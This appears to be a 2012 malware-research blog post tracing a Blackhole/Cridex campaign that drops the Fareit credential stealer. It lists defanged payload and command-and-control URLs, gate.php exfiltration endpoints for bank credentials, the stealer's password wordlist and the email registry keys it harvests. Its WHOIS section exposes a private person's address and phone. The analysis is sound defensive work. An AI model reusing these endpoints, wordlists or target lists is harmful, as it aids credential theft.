The Crime Still Goes On: Trojan Fareit Credential Stealer - New Server, Same Group, Same Game (via BHEK/Cridex)
22 Dec 2012
As per posted A WEEK AGO here -->>[Prev.Post] that Crime Group STILL infects victims.
The infector concepts and binary works is exactly the same as previous,Infection Source Summary & Trojan Communication Info
Spam infector:URL: h00p://www.irwra.com/wp-content/themes/mantra/uploads/cpa_inform.htm
Server: Apache, WordPress
IP: 50.116.98.44
Blackhole:Landing: h00p://latticesoft.net/detects/continues-little.php
Server: nginx/1.3.3
Date: Fri, 21 Dec 2012 18:44:29 GMT
Content-Type: text/html
X-Powered-By: PHP/5.3.14
IP: 59.57.247.185
Trojan Cridex (payload) download url:h00p://latticesoft.net/detects/continues-little.php?zf=30:2v:1f:1j:30&ge=1n:2w:1i:1j:1o:1i:1g:2v:1m:1m&l=1k&iw=z&hf=dTrojan Fareit Download Source:h00p://94.73.129.120:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1Trojan Fareit Stealer Download PoC is as example below:
h00p://188.120.226.30:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
h00p://188.40.109.204:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
h00p://204.15.30.202:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
h00p://59.90.221.6:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
h00p://69.64.89.82:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
h00p://78.28.120.32:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
h00p://74.117.107.25:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
h00p://174.142.68.239:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
h00p://23.29.73.220:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
h00p://81.93.250.157:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
h00p://188.212.156.170:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
h00p://173.203.102.204:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
h00p://84.22.100.108:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
*) With all Proxy's Port/Server: 8080 / nginx/1.0.10POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1Trojan Fareit Callbacks IP:
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: 94.73.129.120:8080
Content-Length: 347
Connection: Keep-Alive
Cache-Control: no-cache
...?f/.....0N}a.9.Je...U;0..
:
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Sat, 22 Dec 2012 08:29:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encodingh00p://132.248.49.112:8080/asp/intro.phpCNC is 62.76.177.51, PoC:
h00p://113.130.65.77:8080/asp/intro.php
h00p://203.113.98.131:8080/asp/intro.php
h00p://110.164.58.250:8080/asp/intro.php
h00p://200.108.18.158:8080/asp/intro.php
h00p://207.182.144.115:8080/asp/intro.php
h00p://148.208.216.70:8080/asp/intro.php
h00p://203.172.252.26:8080/asp/intro.php
h00p://202.6.120.103:8080/asp/intro.php
h00p://203.146.208.180:8080/asp/intro.php
h00p://207.126.57.208:8080/asp/intro.php
h00p://203.80.16.81:8080/asp/intro.php
h00p://202.180.221.186:8080/asp/intro.php// Credentials sent CnC panelCnC Passwords(reversed from Trojan Fareit):
var adminPanelLocation =
'h00p://62.76.177.51/if_Career/';
//Data Modify Process:
h00p://62.76.177.123/mx/2B/in/cp.php?h=8
// Phishing Credentials urls
h00p://62.76.177.51/if_Ipckg/gate.php?botid=RIK-1379CF37C25_9455E50D0B2D20CB&bank=chase
h00p://62.76.177.51/if_Ipckg/gate.php?botid=RIK-1379CF37C25_9455E50D0B2D20CB&bank=wellsfargo
h00p://62.76.177.51/if_Ipckg/gate.php?botid=RIK-1379CF37C25_9455E50D0B2D20CB&bank=bankofamericaphpbb john316 pass slayer
qwerty richard aaaaaa wisdom
jesus blink182 amanda praise
abc123 peaches nothing zxcvbnm
letmein cool ginger samuel
test flower mother mike
love scooter snoopy dallas
password1 banana jessica green
hello james welcome testtest
monkey asdfasdf pokemon maverick
dragon victory iloveyou1 onelove
trustno1 london mustang david
iloveyou 123qwe helpme mylove
shadow startrek justin church
christ george jasmine friend
sunshine winner orange god
master maggie testing destiny
computer trinity apple none
princess online michelle microsoft
tigger 123abc peace bubbles
football chicken secret cocacola
angel junior grace jordan23
jesus1 chris william ilovegod
whatever passw0rd iloveyou2 football1
freedom austin nicole loving
killer sparky muffin nathan
asdf admin gateway emmanuel
soccer merlin fuckyou1 scooby
superman google asshole fuckoff
michael friends hahaha sammy
cheese hope poop maxwell
internet shalom blessing jason
joshua nintendo blahblah john
fuckyou looking myspace1 1q2w3e4r
blessed harley matthew baby
baseball smokey canada red123
starwars joseph silver blabla
purple lucky robert prince
jordan digital forever qwert
faith thunder asdfgh chelsea
summer spirit rachel angel1
ashley bandit rainbow hardcore
buster enter guitar dexter
heaven anthony peanut saved
pepper corvette batman hallo
hunter hockey cookie jasper
lovely power bailey danielle
andrew benjamin soccer1 kitten
thomas iloveyou! mickey cassie
angels 1q2w3e biteme stella
charlie viper hello1 prayer
daniel genesis eminem hotdog
jennifer knight dakota windows
single qwerty1 samantha mustdie
hannah creative compaq gates
qazwsx foobar diamond billgates
happy adidas taylor ghbdtn
matrix rotimi forum gfhjkm hgTYDOMiumAnalysis Summary & Research Materials
This time I dump every memory of Trojan Fareit in txt here-->>[PASTEBIN]↑So you can see which FTP, File, POP/SMTP Credentials data's licked & grabbed - as evidence of this evil stealer crime. Additionally see the Fareit Trojan's config here -->>[PASTEBIN]↑You can confirm targeted online banks info + phishing html codes these actors used. There is slight BHEK changes in PluginDetect Obfuscated Code (Landing Page), I cracked manually with wrote GUIDANCE to decode here -->>[PASTEBIN]PluginDetect before -->>[PASTEBIN] & after decoded-->>[PASTEBIN] Payload binary static & dynamic analysis text(a quicky) -->>[PASTEBIN]Sample download is here -->>[MEDIAFIRE]Captures data is here (PCAP, RegShot, MEMShot, etc)-->>[MEDIAFIRE]Account Phishing Act by current version Trojan
Hello Citi Account Online! Same as previous: Chase Bank! This time BANK OF AMERICA!!!PoC of all possible Email Credentials Also Grabbed
In the previous case, I have strong request to check not only http/ftp/server login, but E-Mail credential. Here we go:POP3_Password2
SMTP_Password2
IMAP_Password2
HTTPMail_Password2
\Microsoft\Windows Live Mail
Software\Microsoft\Windows Live Mail
\Microsoft\Windows Mail
Software\Microsoft\Windows Mail
Software\RimArts\B2\Settings
DataDir
DataDirBak
Mailbox.ini
Software\Poco Systems Inc
Path
\PocoSystem.ini
Program
DataPath
accounts.ini
\Pocomail
Software\IncrediMail
EmailAddress
Technology
PopServer
PopPort
PopAccount
PopPassword
SmtpServer
SmtpPort
SmtpAccount
SmtpPassword
account.cfg
account.cfn
\BatMail
\The Bat!
Software\RIT\The Bat!
Software\RIT\The Bat!\Users depot
Working Directory
ProgramDir
Count
Default
Dir #%d
SMTP Email Address
SMTP Server
POP3 Server
POP3 User Name
SMTP User Name
NNTP Email Address
NNTP User Name
NNTP Server
IMAP Server
IMAP User Name
HTTP User
HTTP Server URL
POP3 User
IMAP User
HTTPMail User Name
HTTPMail Server
SMTP User
POP3 Port
SMTP Port
IMAP Port
POP3 Password2
IMAP Password2
NNTP Password2
HTTPMail Password2
SMTP Password2
POP3 Password
IMAP Password
NNTP Password
HTTP Password
SMTP Password
Software\Microsoft\Internet Account Manager\Accounts
Identities
Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Software\Microsoft\Internet Account Manager
Outlook
\Accounts
identification
identitymgr
inetcomm server passwords
outlook account manager passwords identitiesVirus Total Detection Ratio
Landing Page: (3/45) ---->>[VirusTotal]Trojan Cridex Downloader: (15/44) ---->>[VirusTotal]Trojan Fareit Credential Stealer: (4/45) ---->>[VirusTotal]PoC / Analysis ScreenShots
Malware processes: Payload after self copied(dropped) into %AppData%\ Network HTTP Traffic captured: Need to fix the binary before reversing properly...//Very annoying anti-reverse....
: : :
0x00003cf2 (01) 47 INC EDI
0x00003cf3 (01) 5c POP ESP
0x00003cf4 (05) a9 2835b437 TEST EAX, 0x37b43528
0x00003cf9 (03) 0ff2f8 PSLLD MM7, MM0
0x00003cfc (01) 4b DEC EBX
0x00003cfd (01) 95 XCHG EBP, EAX
0x00003cfe (02) b2 f9 MOV DL, 0xf9
0x00003d00 (01) ef OUT DX, EAX
0x00003d01 (01) 51 PUSH ECX
0x00003d02 (01) ac LODSB
0x00003d03 (01) 46 INC ESI
0x00003d04 (02) 71 77 JNO 0x00003d7d ; 1
0x00003d04 --------------------------------------------------
0x00003d06 (02) 72 71 JB 0x00003d79 ; 2
0x00003d06 --------------------------------------------------
0x00003d08 (02) 77 72 JA 0x00003d7c ; 3
0x00003d08 --------------------------------------------------
0x00003d0a (02) 71 77 JNO 0x00003d83 ; 4
0x00003d0a --------------------------------------------------
0x00003d0c (02) 72 71 JB 0x00003d7f ; 5
: : : : : :
3CE8 50 44 44 33 D7 24 91 FF 62 27 47 5C A9 28 35 B4 PDD3.$..b'G..(5.
3CF8 37 0F F2 F8 4B 95 B2 F9 EF 51 AC 46 71 77 72 71 7...K....Q.Fqwrq
3D08 77 72 71 77 72 71 77 72 71 77 72 71 77 72 71 77 wrqwrqwrqwrqwrqw // This qwrqwr :-(((
3D18 72 71 77 72 71 77 72 71 77 72 71 77 72 71 77 72 rqwrqwrqwrqwrqwr
3D28 71 77 72 71 77 72 71 77 72 71 77 72 71 77 72 71 qwrqwrqwrqwrqwrq
3D38 77 72 71 77 72 71 77 72 71 77 72 71 77 72 71 77 wrqwrqwrqwrqwrqw
3D48 72 71 77 72 71 77 72 71 77 72 71 77 72 71 77 72 rqwrqwrqwrqwrqwr
3D58 71 77 72 71 77 72 71 77 72 71 77 72 71 77 72 71 qwrqwrqwrqwrqwrq
: : :PoC of the same group as previous case
Seriously, it uses the same NS server registered by same person..// latticesoft.net < dns search
;; QUESTION SECTION:
;latticesoft.net. IN ANY
;; ANSWER SECTION:
latticesoft.net. 900 IN A 59.57.247.185
latticesoft.net. 900 IN SOA ns1.amishshoppe.net. . 1356192301 60 120 1048576 900
latticesoft.net. 900 IN NS ns2.amishshoppe.net.
latticesoft.net. 900 IN NS ns1.amishshoppe.net.
;; AUTHORITY SECTION:
latticesoft.net. 900 IN NS ns2.amishshoppe.net.
latticesoft.net. 900 IN NS ns1.amishshoppe.net.
;; ADDITIONAL SECTION:
ns1.amishshoppe.net. 3600 IN A 209.140.18.37
ns2.amishshoppe.net. 3600 IN A 211.27.42.138
//PoC that currently infector domain is in service:
a.root-servers.net. (198.41.0.4)
|\___ i.gtld-servers.net [net] (192.43.172.30)
| |\___ ns2.amishshoppe.net [latticesoft.net] (211.27.42.138) *
| \___ ns1.amishshoppe.net [latticesoft.net] (209.140.18.37) Got authoritative answer
|\___ l.gtld-servers.net [net] (192.41.162.30)
| |\___ ns2.amishshoppe.net [latticesoft.net] (211.27.42.138) *
| \___ ns1.amishshoppe.net [latticesoft.net] (209.140.18.37) (cached)
|\___ m.gtld-servers.net [net] (192.55.83.30)
| |\___ ns2.amishshoppe.net [latticesoft.net] (211.27.42.138) *
| \___ ns1.amishshoppe.net [latticesoft.net] (209.140.18.37) (cached)
|\___ k.gtld-servers.net [net] (192.52.178.30)
| |\___ ns2.amishshoppe.net [latticesoft.net] (211.27.42.138) *
| \___ ns1.amishshoppe.net [latticesoft.net] (209.140.18.37) (cached)
|\___ h.gtld-servers.net [net] (192.54.112.30)
| |\___ ns2.amishshoppe.net [latticesoft.net] (211.27.42.138) *
| \___ ns1.amishshoppe.net [latticesoft.net] (209.140.18.37) (cached)
|\___ b.gtld-servers.net [net] (2001:0503:231d:0000:0000:0000:0002:0030) Not queried
|\___ b.gtld-servers.net [net] (192.33.14.30)
| |\___ ns2.amishshoppe.net [latticesoft.net] (211.27.42.138) *
| \___ ns1.amishshoppe.net [latticesoft.net] (209.140.18.37) (cached)
|\___ e.gtld-servers.net [net] (192.12.94.30)
| |\___ ns2.amishshoppe.net [latticesoft.net] (211.27.42.138) *
| \___ ns1.amishshoppe.net [latticesoft.net] (209.140.18.37) (cached)
|\___ j.gtld-servers.net [net] (192.48.79.30)
| |\___ ns2.amishshoppe.net [latticesoft.net] (211.27.42.138) *
| \___ ns1.amishshoppe.net [latticesoft.net] (209.140.18.37) (cached)
|\___ a.gtld-servers.net [net] (2001:0503:a83e:0000:0000:0000:0002:0030) Not queried
|\___ a.gtld-servers.net [net] (192.5.6.30)
| |\___ ns2.amishshoppe.net [latticesoft.net] (211.27.42.138) *
| \___ ns1.amishshoppe.net [latticesoft.net] (209.140.18.37) (cached)
|\___ g.gtld-servers.net [net] (192.42.93.30)
| |\___ ns2.amishshoppe.net [latticesoft.net] (211.27.42.138) *
| \___ ns1.amishshoppe.net [latticesoft.net] (209.140.18.37) (cached)
|\___ f.gtld-servers.net [net] (192.35.51.30)
| |\___ ns2.amishshoppe.net [latticesoft.net] (211.27.42.138) *
| \___ ns1.amishshoppe.net [latticesoft.net] (209.140.18.37) (cached)
|\___ c.gtld-servers.net [net] (192.26.92.30)
| |\___ ns2.amishshoppe.net [latticesoft.net] (211.27.42.138) *
| \___ ns1.amishshoppe.net [latticesoft.net] (209.140.18.37) (cached)
\___ d.gtld-servers.net [net] (192.31.80.30)
|\___ ns2.amishshoppe.net [latticesoft.net] (211.27.42.138) *
\___ ns1.amishshoppe.net [latticesoft.net] (209.140.18.37) (cached)
//Historical/pDNS related IP-Domain Info:
eaglepointecondo.org A 59.57.247.185
latticesoft.net A 59.57.247.185
eaglepointecondo.biz A 59.57.247.185
sessionid0147239047829578349578239077.pl A 59.57.247.185
// Check AXFR (see whether anyone can changed records w/2ndary DNS)
]$ nslookup
> set type=axfr
> amishshoppe.net
; Transfer failed.
Server: 8.8.8.8
Address: 8.8.8.8#53
// WHOIS Database of DNS Service Domain....
Domain Name: AMISHSHOPPE.NET
Registrar: REGISTER.COM, INC.
Whois Server: whois.register.com
Referral URL: http://www.register.com
Name Server: NS1.AMISHSHOPPE.NET
Name Server: NS2.AMISHSHOPPE.NET
Status: clientTransferProhibited
Updated Date: 15-nov-2012
Creation Date: 15-nov-2012
Expiration Date: 15-nov-2013
// Registrant Database Checks...
Registrant:
Steve Burandt
0n430 Peter Rd
Winfield, IL 60190
US
Phone: +1.6304626711
Email: [email protected]
Registrar Name....: Register.com
Registrar Whois...: whois.register.com
Registrar Homepage: www.register.com
Domain Name: amishshoppe.net
Created on..............: 2012-11-15
Expires on..............: 2013-11-15
Administrative Contact:
Steve Burandt
0n430 Peter Rd
Winfield, IL 60190
US
Phone: +1.6304626711
Email: [email protected]
Technical Contact:
Registercom
Domain Registrar
12808 Gran Bay Pkwy
West Jacksonville, FL 32258
US
Phone: +1.9027492701
Email: [email protected]
DNS Servers:
ns2.amishshoppe.net
ns1.amishshoppe.net
#MalwareMustDie